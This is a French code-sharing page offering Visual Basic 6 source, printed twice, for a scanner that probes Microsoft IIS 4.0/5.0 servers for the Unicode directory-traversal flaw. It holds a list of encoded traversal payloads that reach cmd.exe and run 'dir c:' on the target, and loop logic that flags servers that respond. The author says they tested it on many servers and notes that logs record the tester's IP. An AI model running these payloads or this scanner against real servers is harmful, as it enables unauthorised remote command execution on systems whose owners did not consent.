Accueil > > > SCANNEUR DE FAILLES UNICODES
SCANNEUR DE FAILLES UNICODES
Information sur la source
Description
La failles unicodes est une failles qui est présente sur les serveurs IIS (internet informations Service). Les systèmes vulnérables sont Microsoft IIS 5.0 sur Windows NT 2000 et IIS 4.0 sur Windows NT 4.0. c'était un petit résumé rapides de la failles... Je l'ai testé et bon nombre de serveur possède une failles de ce type ATTENTION: si vous testé ces failles sur un serveur prenez notes que les logs du serveur contiendront votre IP et toutes les failles testé... NOTE: cette source n'est pas de moi... mais j'ai trouvé utile de la mettre.
Source
- Dim test_termine As String
- Dim prochaine As Integer
-
- 'Le code va commencé par vérifier si le textbox n'est pas vide,
- 'si c'est le cas rien ne se passe ; ensuite, le code vérifiera si
- 'le dernier caractère est une barre /, et si c'est le cas, alors il l'enlève
- 'en remplaçant le contenu du textbox par l'adresse sans la barre /
- 'La vérification étant terminé le bouton est désactivé et le code
- 'appelle la fonction search qui va lancer les tests.
- Private Sub Command1_Click()
- If url.Text <> "" Then
- If Right(url.Text, 1) = "/" Then
- url.Text = Mid(url.Text, 1, Len(url.Text) - 1)
- End If
- Command1.Enabled = False
- Call search(1)
- End If
- End Sub
-
- Private Sub form_load()
- 'failles UNICODES qui se trouveras dans le listbox
- 'Vous pouvez utiliser ce soft pour tester d'autres failles
- With failles
- .AddItem "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
- .AddItem "/iisadmpwd/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
- .AddItem "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
- .AddItem "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\"
- .AddItem "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\"
- .AddItem "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir%20c:\"
- .AddItem "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\"
- .AddItem "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir%20c:\"
- .AddItem "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir%20c:\"
- .AddItem "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir%20c:\"
- .AddItem "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir%20c:\"
- .AddItem "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\"
- .AddItem "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
- .AddItem "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir"
- .AddItem "/msadc/..%%35%63../..%%35%63../..%%35%63/winnt/system32/cmd.exe?c+dir"
- .AddItem "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir"
- .AddItem "/msadc/..%255C..%255c..%255cwinnt/system35/cmd.exe?/c+dir"
- .AddItem "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?c+dir"
- .AddItem "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..winnt/system32/cmd.exe?/c+dir"
- End With
- End Sub
-
- 'cette boucle aura pour première valeur le contenu de la variable
- 'val et comme dernière ligne de la liste failles.
- Function search(val As Integer)
- For i = val To failles.ListCount - 1
- prochaine = i + 1
- source.Text = Inet.OpenURL(url.Text & failles.List(i))
- Timer1.Enabled = True
- GoTo fin
- Next i
- Command1.Enabled = True
- fin:
- End Function
-
- 'Première chose: la fonction vérifie si la source n'est pas vide
- 'dans ce cas rien n'est chargée?si elle n'est pas vide, on lance la boucle
- 'La boucle va en fait, tester les caractères 6 par 6 pour voir si dans la source
- 'il n'y a pas de balise.
- Private Sub source_change()
- If source.Text <> "" Then
- For i = 1 To Len(source.Text) - 6
- If Mid(source.Text, i, 6) = "<html>" Or Mid(source.Text, i, 6) = "<script>" Or Mid(source.Text, i, 6) = " < head > " Then
- GoTo fin
- End If
- Next i
- resultat.AddItem (url.Text & failles.List(prochaine - 1))
- text_termine = "oui"
- End If
- fin:
- test_termine = "oui"
- End Sub
-
- 'le timer va donc commencer par vérifier le contenu de la variable
- 'test_termine. Ensuite, si le contenu est oui, il va modifier le contenu de la variable
- 'test_termine par non car un nouveau test va commencer. Il va se désactiver lui même
- 'carc'est la fonction search qui active le timer, Il va également
- 'vider le contenu de la source, et pour finr, il appellera la fonction avec comme variable
- 'val le contenu de prochaine
- Private Sub timer1_timer()
- If test_termine = "oui" Then
- test_termine = "non"
- Timer1.Enabled = False
- source.Text = ""
- Call search(prochaine)
- End If
- End Sub
Dim test_termine As String
Dim prochaine As Integer
'Le code va commencé par vérifier si le textbox n'est pas vide,
'si c'est le cas rien ne se passe ; ensuite, le code vérifiera si
'le dernier caractère est une barre /, et si c'est le cas, alors il l'enlève
'en remplaçant le contenu du textbox par l'adresse sans la barre /
'La vérification étant terminé le bouton est désactivé et le code
'appelle la fonction search qui va lancer les tests.
Private Sub Command1_Click()
If url.Text <> "" Then
If Right(url.Text, 1) = "/" Then
url.Text = Mid(url.Text, 1, Len(url.Text) - 1)
End If
Command1.Enabled = False
Call search(1)
End If
End Sub
Private Sub form_load()
'failles UNICODES qui se trouveras dans le listbox
'Vous pouvez utiliser ce soft pour tester d'autres failles
With failles
.AddItem "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
.AddItem "/iisadmpwd/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
.AddItem "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
.AddItem "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\"
.AddItem "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\"
.AddItem "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir%20c:\"
.AddItem "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\"
.AddItem "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir%20c:\"
.AddItem "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir%20c:\"
.AddItem "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir%20c:\"
.AddItem "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir%20c:\"
.AddItem "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\"
.AddItem "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
.AddItem "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir"
.AddItem "/msadc/..%%35%63../..%%35%63../..%%35%63/winnt/system32/cmd.exe?c+dir"
.AddItem "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir"
.AddItem "/msadc/..%255C..%255c..%255cwinnt/system35/cmd.exe?/c+dir"
.AddItem "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?c+dir"
.AddItem "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..winnt/system32/cmd.exe?/c+dir"
End With
End Sub
'cette boucle aura pour première valeur le contenu de la variable
'val et comme dernière ligne de la liste failles.
Function search(val As Integer)
For i = val To failles.ListCount - 1
prochaine = i + 1
source.Text = Inet.OpenURL(url.Text & failles.List(i))
Timer1.Enabled = True
GoTo fin
Next i
Command1.Enabled = True
fin:
End Function
'Première chose: la fonction vérifie si la source n'est pas vide
'dans ce cas rien n'est chargée?si elle n'est pas vide, on lance la boucle
'La boucle va en fait, tester les caractères 6 par 6 pour voir si dans la source
'il n'y a pas de balise.
Private Sub source_change()
If source.Text <> "" Then
For i = 1 To Len(source.Text) - 6
If Mid(source.Text, i, 6) = "<html>" Or Mid(source.Text, i, 6) = "<script>" Or Mid(source.Text, i, 6) = " < head > " Then
GoTo fin
End If
Next i
resultat.AddItem (url.Text & failles.List(prochaine - 1))
text_termine = "oui"
End If
fin:
test_termine = "oui"
End Sub
'le timer va donc commencer par vérifier le contenu de la variable
'test_termine. Ensuite, si le contenu est oui, il va modifier le contenu de la variable
'test_termine par non car un nouveau test va commencer. Il va se désactiver lui même
'carc'est la fonction search qui active le timer, Il va également
'vider le contenu de la source, et pour finr, il appellera la fonction avec comme variable
'val le contenu de prochaine
Private Sub timer1_timer()
If test_termine = "oui" Then
test_termine = "non"
Timer1.Enabled = False
source.Text = ""
Call search(prochaine)
End If
End Sub
Conclusion
Vous pouvez utilisez cette pour testez d'autres type de failles.
Sources du même auteur
Sources de la même categorie
Commentaires et avis
|
Derniers Blogs
[TECHDAYS 2012] SESSION WEBMATRIX 2 : LE COUTEAU SUISSE GRATUIT POUR VOS DéVELOPPEMENTS WEB - SLIDES[TECHDAYS 2012] SESSION WEBMATRIX 2 : LE COUTEAU SUISSE GRATUIT POUR VOS DéVELOPPEMENTS WEB - SLIDES par gpommier
Suite à la session que j'ai présenté sur WebMatrix 2, vous pouvez trouver les slides ici, ainsi que les démos en packages nuget : démos1 et démos2 J'en profite pour remercier chaleureusement tous ceux qui sont venus très nombreux à cette sess...
Cliquez pour lire la suite de l'article par gpommier [SHAREPOINT] LES SESSIONS TECHDAYS 2012.[SHAREPOINT] LES SESSIONS TECHDAYS 2012. par Patrick Guimonet
Voici donc pour ceux qui n'ont pas pu venir, ou ceux qui n'ont pas pu toutes les suivre la liste des sessions SharePoint aux TechDays 2012, que je mettrais à jour dès que les liens des vidéo seront disponibles. Ou ici : http...
Cliquez pour lire la suite de l'article par Patrick Guimonet TECHDAYS PARIS 2012 : SESSION PLEINIèRE JOUR 3TECHDAYS PARIS 2012 : SESSION PLEINIèRE JOUR 3 par ROMELARD Fabrice
Speaker: Bernard Ourghanlian Cette session est comme chaque jour transmise en live par BrainSonic, et j'ai donc suivi cette troisième pleinière par ce moyen sur mon iPad . Elle est dédiée comme chaque année à la mise en perspective de l'é...
Cliquez pour lire la suite de l'article par ROMELARD Fabrice MISHRA READER : UN LECTEUR RSS TRèS ZUNE STYLE EN OPEN SOURCE !MISHRA READER : UN LECTEUR RSS TRèS ZUNE STYLE EN OPEN SOURCE ! par Vko
Hier durant une session dédiée aux Techdays 2012, j'ai eu le plaisir d'annoncer la sortie de la Béta 2 de Mishra Reader. C'est quoi ? Pour les utilisateurs, c'est une vraie expérience de lecture de flux RSS sur Windows. Rien à voir avec les produit...
Cliquez pour lire la suite de l'article par Vko [FRAMEWORK 4] LES TASKS ET LE THREAD UI[FRAMEWORK 4] LES TASKS ET LE THREAD UI par fathi
Je viens de passer quelques temps au TechDay's et j'ai pu voir pas mal de session intéressante. Par contre une chose m'a un peu étonné lors de certaines de ces sessions qui abordaient les améliorations du framework .NET (donc le 4.5) : en gros, bea...
Cliquez pour lire la suite de l'article par fathi
Logiciels
Academy System (17.2.1.0)ACADEMY SYSTEM (17.2.1.0)Logiciel de gestion des établissements.
- élèves/étudiants (inscription, dossier, absence...)
-... Cliquez pour télécharger Academy System Easy-Planning (1.0.0.1)EASY-PLANNING (1.0.0.1)Basé sur les mêmes principes que MyPlanning, Easy-Planning permet de créer des plannings sous la ... Cliquez pour télécharger Easy-Planning COLLECTOR PLUS (3.00B)COLLECTOR PLUS (3.00B)COLLECTOR PLUS version 3.00B est un logiciel utilisant une base de données alimentée par :
- L... Cliquez pour télécharger COLLECTOR PLUS PONAMEDIA PREMIUM - HELLLOOO FLASH DEMO (V7.4)PONAMEDIA PREMIUM - HELLLOOO FLASH DEMO (V7.4)PONAMEDIA TV DEVIENS HELLLOOO FLASH
LA TV SUR VOTRE ORDINATEUR.
Toute une plateforme Multi... Cliquez pour télécharger PONAMEDIA PREMIUM - HELLLOOO FLASH DEMO LettresFaciles 2011 (8.0.0.1)LETTRESFACILES 2011 (8.0.0.1)LettresFaciles est un logiciel facilitant la création et la rédaction de lettres types.
Son inte... Cliquez pour télécharger LettresFaciles 2011
|